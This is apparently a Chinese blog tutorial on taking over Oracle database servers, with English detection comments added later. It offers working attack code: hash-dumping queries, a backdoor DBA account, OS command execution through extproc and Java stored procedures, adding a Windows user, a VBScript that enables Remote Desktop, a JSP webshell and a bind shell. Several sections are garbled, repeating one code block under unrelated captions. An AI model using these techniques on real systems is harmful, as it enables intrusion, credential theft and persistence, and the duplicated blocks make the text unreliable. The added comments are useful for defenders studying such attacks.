# 鬼仔注:Open发我的一张图片 oracle_scanner.png
作者:Robert
配合open那个工具
第一部分
基本查询指令
-- Reconnaissance against the Oracle data dictionary. Most of these views
-- (V$PWFILE_USERS, DBA_USERS, DBA_SYS_PRIVS, DBA_ROLE_PRIVS, DBA_DIRECTORIES, USER$)
-- are readable only with DBA-level rights or SELECT ANY DICTIONARY, so a low-privilege
-- session running them successfully is itself a finding worth investigating.
-- NOTE(review): the trailing `//` annotations are the author's notes, not SQL comments,
-- and the typographic quotes (’ “) on several lines are a blog smart-quote artifact;
-- the statements are left byte-identical here.
select * from V$PWFILE_USERS //查看dba用户
select * from v$version //查看oracle版本以及系统版本
select * from session_privs;// 查看当前用户拥有的权限值
select * from user_role_privs//查询当前用户角色
select * from user_sys_privs//查询当前用户系统权限
-- Exposes stored password hashes for every account (DBA_USERS.PASSWORD, USER$ below).
-- Reads of these columns should be audited: hash disclosure enables offline cracking.
select username,password from dba_users; //查看所有用户密码hash
select * from dba_sys_privs where grantee=’SYSTEM’;//查系统权限
-- Grants SELECT ANY DICTIONARY to SYSTEM with ADMIN OPTION (SYSTEM may re-grant it);
-- the author's note says this is a workaround for failed OEM logins.
grant select any dictionary to system with admin option;//登陆不上OEM时候需要此权限
Select name,password FROM user$ Where name=’SCOTT’; //低版本查看单用户密码
Select username,decode(password,NULL,’NULL’,password) password FROM dba_users; //查看用户hash
-- Creates a new account and grants it DBA: a persistence step. Alert on CREATE USER and
-- GRANT DBA, and reconcile DBA_ROLE_PRIVS against an approved list — the
-- granted_role=’DBA’ query a few lines below is exactly that reconciliation.
create user bob identified by iloveyou;//建用户bob密码iloveyou
grant dba to bob;//赋予bob DBA权限
grant execute on xmldom to bob //赋予用户execute
-- JAVAUSERPRIV / JAVASYSPRIV are the roles that gate Java stored-procedure access to
-- OS resources; creating them by hand is a precondition for the command-execution
-- sections further down and should be alerted on.
Create ROLE “javauserpriv” NOT IDENTIFIED
Create ROLE “javasyspriv” NOT IDENTIFIED //当提示role ‘JAVASYSPRIV’ does not exist使用
select grantee from dba_role_privs where granted_role=’DBA’; //检查那些用户有DBA权限
-- DBA_DIRECTORIES lists DIRECTORY objects, i.e. the filesystem paths UTL_FILE can reach.
select * from dba_directories;//查看路径所在目录
第二部分,创建java,执行系统命令
no.1
-- PL/SQL external-procedure bridge: the LIBRARY aliases the Windows C runtime
-- (msvcrt.dll) and ORACMD.EXEC is bound to its "system" entry point, so whatever string
-- is passed to ORACMD.EXEC is run as an OS command by the extproc agent.
-- Preconditions visible here: the CREATE LIBRARY (or CREATE ANY LIBRARY) privilege and a
-- working extproc listener entry. Hardening: restrict extproc to named DLLs with
-- EXTPROC_DLLS in extproc.ora / listener.ora, or remove the extproc entry if external
-- procedures are unused. Detection: new DBA_LIBRARIES rows whose FILE_SPEC points
-- outside $ORACLE_HOME, and CREATE LIBRARY / CREATE PACKAGE audit records.
-- (The `/` and `show errors` tokens are SQL*Plus directives collapsed onto one line.)
Create or REPLACE LIBRARY exec_shell AS 'c:/windows/system32/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
上面这个没有回显的
如果不行可以使用下面这个
-- Same external-procedure bridge as above, differing only in the LIBRARY path
-- ($ORACLE_HOME/msvcrt.dll instead of the system32 copy); the author's note says this
-- variant produces no output echo. The same controls apply: audit DBA_LIBRARIES,
-- constrain extproc with EXTPROC_DLLS, and alert on CREATE LIBRARY.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
执行完后
执行
-- Invokes the external procedure to add a local Windows account. On the host this
-- shows up as net1.exe spawned by the extproc agent and as a Security log 4720
-- (user account created) event — both strong signals of database-to-OS escalation,
-- since an Oracle service should never be creating OS users.
exec oracmd.exec ('net1 user robert iloveyou /add');
no2.
-- Java stored procedure that spawns `cmd.exe /y /c <command>` (Windows branch) or
-- `/bin/sh -c <command>` and echoes the child's stdout/stderr through System.out;
-- HOST_COMMAND is the PL/SQL call spec over Host.executeCommand. The three
-- DBMS_JAVA.grant_permission calls widen SYSTEM's Java policy (a FilePermission grant
-- plus read/writeFileDescriptor RuntimePermissions); the FilePermission target appears
-- as '<>' here, evidently mangled by HTML extraction. The closing anonymous block is the
-- author's smoke test (`dir C:/`).
-- Detection: DBA_JAVA_POLICY grants of FilePermission / RuntimePermission to non-SYS
-- schemas, unfamiliar JAVA SOURCE / JAVA CLASS objects in DBA_OBJECTS, and cmd.exe or sh
-- processes whose parent is the Oracle server process.
Create or REPLACE AND COMPILE JAVA SOURCE NAMED "Host" AS import java.io.*; public class Host { public static void executeCommand(String command) { try { String[] finalCommand; if (isWindows()) { finalCommand = new String[4]; // Use the appropriate path for your windows version. finalCommand[0] = "C://windows//system32//cmd.exe"; // Windows XP/2003 //finalCommand[0] = "C://winnt//system32//cmd.exe"; // Windows NT/2000 finalCommand[1] = "/y"; finalCommand[2] = "/c"; finalCommand[3] = command; } else { finalCommand = new String[3]; finalCommand[0] = "/bin/sh"; finalCommand[1] = "-c"; finalCommand[2] = command; } final Process pr = Runtime.getRuntime().exec(finalCommand); pr.waitFor(); new Thread(new Runnable(){ public void run() { BufferedReader br_in = null; try { br_in = new BufferedReader(new InputStreamReader(pr.getInputStream())); String buff = null; while ((buff = br_in.readLine()) != null) { System.out.println("Process out :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_in.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process output."); ioe.printStackTrace(); } finally { try { br_in.close(); } catch (Exception ex) {} } } }).start(); new Thread(new Runnable(){ public void run() { BufferedReader br_err = null; try { br_err = new BufferedReader(new InputStreamReader(pr.getErrorStream())); String buff = null; while ((buff = br_err.readLine()) != null) { System.out.println("Process err :" + buff); try {Thread.sleep(100); } catch(Exception e) {} } br_err.close(); } catch (IOException ioe) { System.out.println("Exception caught printing process error."); ioe.printStackTrace(); } finally { try { br_err.close(); } catch (Exception ex) {} } } }).start(); } catch (Exception ex) { System.out.println(ex.getLocalizedMessage()); } } public static boolean isWindows() { if (System.getProperty("os.name").toLowerCase().indexOf("windows") != -1) return true; else return false; } }; / Create or REPLACE PROCEDURE host_command 
(p_command IN VARCHAR2) AS LANGUAGE JAVA NAME 'Host.executeCommand (java.lang.String)'; / EXEC DBMS_JAVA.grant_permission('SYSTEM', 'java.io.FilePermission', '<>', 'read ,write, execute, delete'); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'writeFileDescriptor', ''); EXEC Dbms_Java.Grant_Permission('SYSTEM', 'SYS:java.lang.RuntimePermission', 'readFileDescriptor', ''); / DECLARE l_output DBMS_OUTPUT.chararr; l_lines INTEGER := 1000; BEGIN DBMS_OUTPUT.enable(1000000); DBMS_JAVA.set_output(1000000); host_command('dir C:/'); DBMS_OUTPUT.get_lines(l_output, l_lines); END;
这个要注意两点
win下注意系统路径
linux下注意注释掉win
最后一句就是执行命令的
-- Direct call to the HOST_COMMAND procedure defined above, repeating the `dir C:/` test
-- from the anonymous block. The quotes are typographic (blog artifact), so the line is
-- not valid as written; left byte-identical.
host_command(‘dir C:/’);
no3.
-- Second command-execution wrapper: Java class util.RunThis passes its argument straight
-- to Runtime.exec, copies the child's stdout to System.out and returns the exit code.
-- RUN_CMz is the PL/SQL function call spec over it, RC a procedure wrapper, and the
-- trailing `grant javasyspriv to system` is the enabling step (see the author's note
-- below). Detection: JAVASYSPRIV grantees in DBA_ROLE_PRIVS, JAVA SOURCE / JAVA CLASS
-- objects in DBA_OBJECTS not owned by SYS, and child processes of the Oracle server.
-- (SQL*Plus directives `/`, `variable`, `set serveroutput` are collapsed onto one line.)
create or replace and compile java souRCe named "util" as import java.io.*; import java.lang.*; public class util extends Object { public static int RunThis(String args) { Runtime rt = Runtime.getRuntime(); int RC = -1; try { Process p = rt.exec(args); int bufSize = 4096; BufferedInputStream bis =new BufferedInputStream(p.getInputStream(), bufSize); int len; byte buffer[] = new byte[bufSize]; // Echo back what the program spit out while ((len = bis.read(buffer, 0, bufSize)) != -1) System.out.write(buffer, 0, len); RC = p.waitFor(); } catch (Exception e) { e.printStackTrace(); RC = -1; } finally { return RC; } } } / create or replace function RUN_CMz(p_cmd in varchar2) return number as language java name 'util.RunThis(java.lang.String) return integer'; / create or replace procedure RC(p_cmd in varChar) as x number; begin x := RUN_CMz(p_cmd); end; / variable x number; set serveroutput on; exec dbms_java.set_output(100000); grant javasyspriv to system;
这句注意最后这里要授权下当前登陆的用户
-- Grants the JAVASYSPRIV role to the schema the author is logged in as (SYSTEM). This
-- is the permission that lets the Java wrapper above reach Runtime.exec; without it the
-- call is refused by the Java security policy. Alert on GRANT JAVASYSPRIV / JAVA_ADMIN
-- and reconcile DBA_ROLE_PRIVS against an approved list.
grant javasyspriv to system
最后执行
-- Runs ipconfig through RUN_CMz and stores the exit code in the bind variable :x — the
-- author's smoke test for the wrapper. Host-side this is ipconfig.exe spawned by the
-- Oracle server process, which in normal operation spawns no shells or system utilities.
exec :x:=run_cmz('ipconfig');
第二部分 操作磁盘文件
no1.
建立目录
-- Creates a DIRECTORY object aliasing the drive root, giving UTL_FILE (and anything else
-- that takes a DIRECTORY) reach across the whole C: volume. Requires CREATE ANY DIRECTORY.
-- Review DBA_DIRECTORIES for entries at filesystem roots or system paths; legitimate
-- directories should point into dedicated data/export folders.
create or replace directory DIR as 'C:/';
此目录当然也可以是启动目录
授权
-- Grants READ and WRITE on the directory to SYSTEM. The author's note below says this
-- step can be skipped, which is consistent with SYSTEM already holding DBA. Directory
-- object grants are visible in DBA_TAB_PRIVS and are worth reviewing alongside
-- DBA_DIRECTORIES.
grant read, write on directory DIR to system
这步可以不用
然后执行操作
写文件 3129_code.txt
# 鬼仔注:写文件的这段代码被nod32误报,好多人以为是被挂马了,无奈只好写进txt了
这步操作讲下载我的木马到c盘并执行
-- Writes a VBScript through UTL_FILE into DIRECTORY 'DIR' (mapped to C:/ earlier on
-- the page) and then runs it via the RUN_CMz Java wrapper. The script reads the RDP
-- PortNumber and, when fDenyTSConnections is not 0, sets it to 0 — i.e. it enables
-- Remote Desktop on the database host.
-- Detection on the host: cscript.exe spawned by the Oracle server process, a new .vbs
-- at the drive root, and a registry value-set on
-- ...\Terminal Server\fDenyTSConnections (Sysmon Event ID 13). In the database, the
-- enabling controls are the root-level DIRECTORY object and its WRITE grant.
declare file utl_file.file_type; begin file := utl_file.fopen('DIR', '3389.vbs', 'W'); utl_file.put_line(file, 'Dim OperationRegistry Set OperationRegistry=WScript.createObject("WScript.Shell") Dim TSPort,TSState,TSRegPath TSRegPath="HKLM/System/CurrentControlSet/Control/Terminal Server/WinStations/RDP-Tcp/PortNumber" TSPort=OperationRegistry.RegRead(TSRegPath) TSRegPath="HKEY_LOCAL_MACHINE/SYSTEM/CurrentControlSet/Control/Terminal Server/fDenyTSConnections" TSState=OperationRegistry.RegRead(TSRegPath) If TSState=0 Then Else OperationRegistry.RegWrite TSRegPath,0,"REG_DWORD" End If'); utl_file.fflush(file); utl_file.fclose(file); end; / exec :x:=run_cmz('cscript c:/3389.vbs');
vbs开启3389
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1.
-- The caption above ("vbs开启3389") describes different code, which appears to have
-- been lost when the page was extracted; treat this block as a placeholder, not as that
-- code. Controls are the same as for the original: DBA_LIBRARIES audit, EXTPROC_DLLS.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
0
无net添加admin用户
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1.
-- The caption above ("无net添加admin用户") describes different code that appears to have
-- been lost in extraction; treat this block as a placeholder rather than as that code.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
1
这个代码的作用是用来读取对方的3389端口并post下自己的网站数据库里
这个read.asp和ro.asp自己写吧
到此win下操作基本上是完成了
第三部分 linux的一些操作
linux的操作要用到sqlj语言
其实ISTO的kj总早就写了一些
我总结
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1,
-- although this section is about Linux and the text promises a long sqlj listing; that
-- listing (the BOB_* functions called just below) appears to have been lost in
-- extraction. A Windows DLL path cannot be what the author ran on Linux.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
2
这么一大段,仔细看
执行完后
-- Calls to BOB_* functions whose definitions do not appear anywhere on this page (the
-- sqlj source the author refers to seems to have been lost in extraction). Quotes are
-- typographic blog artifacts. By name and usage they list directories, run commands,
-- read and write files, and open a listening shell — presumably Java stored procedures
-- backed by java.io / java.lang.Runtime / java.net; TODO confirm against the source.
-- Detection: unfamiliar JAVA SOURCE / JAVA CLASS objects in DBA_OBJECTS, JAVASYSPRIV
-- grantees in DBA_ROLE_PRIVS, and a new listening socket owned by the database server
-- process on the host.
Select BOB_LISTFOLDER(‘/usr’) FROM DUAL //列目录
Select BOB_EXECFILE(‘C:/WINDOWS/system32/cmd.exe /c dir c:/’,’GBK’) FROM DUAL; //执行命令
Select BOB_READFILE(‘/tmp/1.txt’,’GBK’) FROM DUAL; //读文件
Select BOB_SAVEFILE(‘/tmp/1.jsp’,'<%if(request.getParameter(“f”)!=null)(new java.io.FileOutputStream(application.getRealPath(“//”)+request.getParameter(“f”))).write(request.getParameter(“t”).getBytes());%>’) FROM DUAL; 写jsp一句话 可查看我的上一篇BLOG
Select BOB_BINDSHELL(20000) FROM DUAL //开启端口2000然后你telnet ip 2000上去
其中本来还有reserver shell的
我还没来的及测试
我自己是更中意反弹shell的
特别是linux
好操作的多
再说有时候linux是nat出来的
反弹就省去了许多麻烦
第四部分 技巧
一句话读取3389端口
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1.
-- The caption above ("一句话读取3389端口") describes different code that appears to have
-- been lost in extraction; treat this block as a placeholder rather than as that code.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
3
一句话开3389 只合适win 2k3
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1.
-- The caption above ("一句话开3389 只合适win 2k3") describes different code that appears
-- to have been lost in extraction; treat this block as a placeholder, not as that code.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
4
删除pcanywhere导致的终端登陆错误
-- NOTE(review): byte-identical to the msvcrt.dll LIBRARY / ORACMD block in part 2 no.1.
-- The caption above ("删除pcanywhere导致的终端登陆错误") describes different code that
-- appears to have been lost in extraction; treat this block as a placeholder.
Create or REPLACE LIBRARY exec_shell AS '$ORACLE_HOME/msvcrt.dll'; / show errors Create or REPLACE PACKAGE oracmd IS PROCEDURE exec (cmdstring IN CHAR); end oracmd; / show errors Create or REPLACE PACKAGE BODY oracmd IS PROCEDURE exec(cmdstring IN CHAR) IS EXTERNAL NAME "system" LIBRARY exec_shell LANGUAGE C; end oracmd; / show errors
5
感谢kj,和linx的文章.
最后说下,关于web injection部分
有时间在整理吧
不妥之处,请指教 QQ:1972097
over